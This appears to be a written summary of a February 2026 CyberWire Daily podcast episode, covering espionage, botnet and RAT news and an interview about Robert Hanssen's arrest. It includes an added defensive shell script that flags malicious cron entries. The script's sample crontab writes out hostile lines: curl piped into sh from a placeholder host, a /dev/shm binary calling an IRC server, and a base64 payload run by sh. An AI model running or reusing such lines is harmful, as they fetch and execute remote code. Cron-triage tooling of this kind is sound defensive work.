CyberWire Daily — "Rooted and patient."
Date: February 18, 2026
Host: Dave Bittner (N2K Networks)
Guest: Keith Milarski (former FBI Special Agent, Chief Global Ambassador at Q Intel)
Overview
This episode delivers the latest in cybersecurity news, touching on international cyber-espionage, emerging vulnerabilities, response to cyber threats, regulatory changes, and legal developments impacting VPNs. The featured interview with Keith Milarski revisits the arrest of Robert Hanssen, the most damaging spy in FBI history, offering rare firsthand insight on its 25th anniversary.
Key Discussion Points and Insights
1. Cyber-Espionage and Vulnerabilities
China-linked Group Exploits Dell Zero-Day
- [00:02-03:00]
- Google and Mandiant report that UNC6201 (Silk Typhoon) exploited a critical Dell RecoverPoint for VMs vulnerability for at least 18 months, leveraging a hardcoded administrator password for unauthenticated remote root access.
- Dwell times of 400+ days allowed sustained espionage; the attackers first deployed the Brickstorm backdoor and later replaced it with Grim Bolt.
- Quote:
“Officials warn the actors likely remain active in unpatched systems. Long dwell times, often exceeding 400 days, gave attackers room for sustained espionage.” – Dave Bittner [03:00]
Microsoft 365 Copilot AI Data Leak
- [04:00-05:00]
- Since Jan 21, Copilot has been summarizing emails that Data Loss Prevention (DLP) policies mark as confidential, bypassing those policies. Fixes began rolling out in February, but full remediation is pending.
- Microsoft is tracking the issue under a service advisory; the known scope is limited, but the investigation is ongoing.
Linux Botnet "SSH Stalker" Using IRC
- [05:00-06:40]
- Flare researchers uncovered SSH Stalker, a botnet exploiting legacy Linux kernel flaws, managed via IRC channels.
- It quietly maintains persistence without overt attacks, signaling possible preparation for larger operations.
- Advice:
“Flare recommends monitoring build tools, scanning for malware, and reviewing cron jobs.”
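Of Flare's three recommendations, reviewing cron jobs is the one a defender can script directly. The following is an added example, not code from the podcast, from Flare, or from any SSH Stalker report: a POSIX shell triage that prints cron entries matching persistence patterns a Linux botnet typically leaves behind (download-and-execute one-liners, base64-decoded payloads, executables staged in world-writable directories, every-minute schedules). The indicator regexes, the constructed sample crontab, and the placeholder hosts 198.51.100.7 and irc.example.net are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the podcast or Flare. Flags cron entries that match
# persistence patterns a Linux botnet would leave behind. The indicator regexes
# below are illustrative assumptions, not a published signature set.

# Download-and-execute one-liner: curl/wget piped straight into a shell.
IOC_DOWNLOAD_EXEC='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
# Payload hidden in base64 and decoded at run time.
IOC_BASE64='base64[[:space:]]+(-d|--decode)'
# Executable staged in a world-writable or memory-backed directory.
IOC_TMP_EXEC='(^|[[:space:]=])(/tmp|/dev/shm|/var/tmp)/'
# Job scheduled every minute (typical beacon / self-repair cadence).
IOC_MINUTELY='^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]'

# triage_cron_file FILE
# Prints one "SUSPECT [indicators]: line" per matching entry; comments and
# blank lines are ignored. Always returns 0 so it can be chained safely.
triage_cron_file() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while IFS= read -r line; do
        hits=""
        printf '%s\n' "$line" | grep -Eq "$IOC_DOWNLOAD_EXEC" && hits="$hits download-exec"
        printf '%s\n' "$line" | grep -Eq "$IOC_BASE64"        && hits="$hits base64-payload"
        printf '%s\n' "$line" | grep -Eq "$IOC_TMP_EXEC"      && hits="$hits tmp-exec"
        printf '%s\n' "$line" | grep -Eq "$IOC_MINUTELY"      && hits="$hits every-minute"
        if [ -n "$hits" ]; then
            printf 'SUSPECT [%s]: %s\n' "${hits# }" "$line"
        fi
    done
    return 0
}

# triage_host_cron
# Runs the triage over the usual system and per-user cron locations
# (readable files only; per-user spools normally need root).
triage_host_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        triage_cron_file "$f" | sed "s|^|$f: |"
    done
    return 0
}

# Constructed sample crontab (not a real capture). 198.51.100.7 is a
# documentation address and irc.example.net a placeholder C2 name.
SAMPLE_CRONTAB=$(mktemp)
trap 'rm -f "$SAMPLE_CRONTAB"' EXIT
cat > "$SAMPLE_CRONTAB" <<'EOF'
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -s http://198.51.100.7/x.sh | sh
@reboot /dev/shm/.s/sshd -c irc.example.net:6667
0 */6 * * * echo aGVsbG8= | base64 -d | sh
EOF

# Run over the sample; on a real host call triage_host_cron as root instead.
triage_cron_file "$SAMPLE_CRONTAB"
```

The two benign entries (the apt update and the five-minute backup) produce no output; the three constructed malicious lines are each flagged with the indicator that fired. Treat a hit as a lead for manual review, not a verdict: legitimate jobs do occasionally pipe curl into a shell or run every minute, which is exactly why the script prints the matching indicator next to the line rather than deleting anything.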
2. Regulation, National Strategies, and Supply Chain Security
Switzerland: Mandatory Cyberattack Reporting
- [06:40-08:00]
- New laws in effect since April 2025; critical infrastructure must report incidents within 24 hours.
- Centralized hubs and increased budgets signal growing focus on coordinated national defense.
Notepad++ Supply Chain Attack and Response
- [11:00-12:00]
- Following a compromise attributed to the Lotus Blossom group, Notepad++ now uses “double lock” update verification and other hardening measures.
- Advice:
“Users are urged to upgrade and download installers only from the official website.”
3. Threat Intelligence and Campaigns
"astarion RAT" and Social Engineering Rise
- [08:00-10:00]
- Huntress details a click-fix social engineering campaign deploying Matanbukas loader and a new RAT called astarion.
- Features include encrypted C2 disguised as telemetry, credential theft, proxying, and rapid lateral movement.
- Goal assessed as likely ransomware or data theft.
Iranian-Aligned Espionage Targeting Protest Supporters
- [12:00-13:40]
- “Crescent Harvest” campaign uses Farsi-language Windows shortcut files as malware lures for activists and journalists.
- Malware uses DLL sideloading via a signed Google binary, offering persistent surveillance capabilities.
4. Application Security Flaws
PDF Platform Vulnerabilities
- [10:00-11:00]
- Novi researchers found 16 vulnerabilities in Foxit and Aprise’s cloud PDF tools.
- Impact includes RCE, account takeover, and data exfiltration, especially in enterprise environments.
- Vendors have patched these holes.
5. Policy and Legal Actions
Spain Orders VPNs to Block Football Piracy Sites
- [13:40-15:00]
- Court ordered NordVPN and ProtonVPN to block access to 16 pirate streaming sites under EU Digital Services Act.
- The providers were not given a chance to appeal or to represent their interests; both question the order's due process and efficacy.
- Quote:
“NordVPN also argued that blocking domains is ineffective and that enforcement should target hosting providers and illegal content sources.” – Dave Bittner
6. Featured Interview: Keith Milarski on the 25th Anniversary of Robert Hanssen’s Arrest
Background and Hanssen’s Espionage
- [16:54-19:15]
- Hanssen served as an FBI agent who spied for the Soviets/Russians for over 20 years.
- Compromised sensitive operations, intelligence, and the identities of U.S. human assets.
- Quote:
“He just compromised so many sensitive intelligence operations, human sources, the tunnel that we tried to dig underneath the Soviet embassy… He was just utterly devastating.” – Keith Milarski [16:56]
The Hunt and Discovery
- [19:15-23:22]
- Initial suspicion fell on a CIA officer, but key evidence (a recorded voice, a fingerprint on a trash bag) pointed to Hanssen.
- Operation involved tailing Hanssen, planting mics, surveilling his activities, and eventually setting up for an arrest.
The Arrest Itself
- [23:22-27:44]
- Hanssen scheduled a dead drop (“Ellis”) at Foxstone Park, VA for Feb 18, 2001.
- Surveillance teams mobilized early; watched Hanssen prepare and execute the drop.
- SWAT and support teams swarmed and apprehended him as he left the park.
- Quote:
“Your adrenaline starts running… we see him wrap it up, get back in his car and driving over to the park… as he's coming out… that's where we get go take him down… and took him into custody and put handcuffs on him.” – Keith Milarski [25:54-27:44]
Reflections and Emotional Impact
- [27:44-29:33]
- Profound sense of betrayal among FBI ranks, but also relief and pride in securing justice.
- Hanssen was identified only a narrow window before his retirement, so arresting him was both a victory and a necessity.
- Quote:
“You work with a colleague and you think everybody…wants to protect the American people. And then to have somebody that is betraying all your work…that is a weird feeling…” – Keith Milarski [28:07]
7. Oddities and Notable Moments
F-35 "Jailbreak" Possibility
- [30:03-end]
- Dutch defense official Gies Tuenman joked about “jailbreaking” an F-35 if US locks out software updates due to shifting alliances.
- Experts dismiss the comparison of an F-35 to an "iPhone," noting extreme software protections and unique arrangements (only Israel runs its own code).
- Quote:
“The idea of rebooting a fighter jet like a smartphone carries a certain dark charm.” – Dave Bittner
Notable Quotes
- On root-level persistence by Chinese APT: “Long dwell times, often exceeding 400 days, gave attackers room for sustained espionage.” – Dave Bittner [03:00]
- On the Hanssen case: “He spied for the Soviets and then the Russians for over 20 years. He started first volunteering to the GRU... then the KGB… He just compromised so many sensitive intelligence operations, human sources...” – Keith Milarski [16:56]
- On the arrest operation: “We see him wrap it up, get back in his car and driving over to the park… as he's coming out… that's where we get go take him down…” – Keith Milarski [25:54-27:44]
- On emotional response: “To have somebody that is betraying all your work to an enemy… that is a weird feeling that just people don't experience.” – Keith Milarski [28:07]
Timestamps for Important Segments
- Chinese APT exploits Dell zero-day: 00:02–03:00
- Microsoft 365 Copilot data leak: 04:00–05:00
- SSH Stalker botnet uncovered: 05:00–06:40
- Switzerland’s new cyber laws: 06:40–08:00
- Huntress: Click-fix campaign & astarion RAT: 08:00–10:00
- Serious PDF vulnerabilities: 10:00–11:00
- Notepad++ supply chain response: 11:00–12:00
- Iranian-aligned “Crescent Harvest” campaign: 12:00–13:40
- Spain orders VPNs to block piracy sites: 13:40–15:00
- Keith Milarski on Robert Hanssen’s espionage & arrest: 16:54–29:33
- Dutch F-35 “jailbreak” controversy: 30:03–end
Episode Tone
The episode offers serious, technical reporting with a tone of urgency and professionalism, especially in the interview, which brings sober, firsthand accounts of high-stakes counterintelligence work. The closing segment injects a touch of dry humor regarding the F-35 “jailbreak” comparison.
This detailed summary covers all critical stories and provides a comprehensive view of the episode's expert insights, ensuring value for listeners and non-listeners alike.
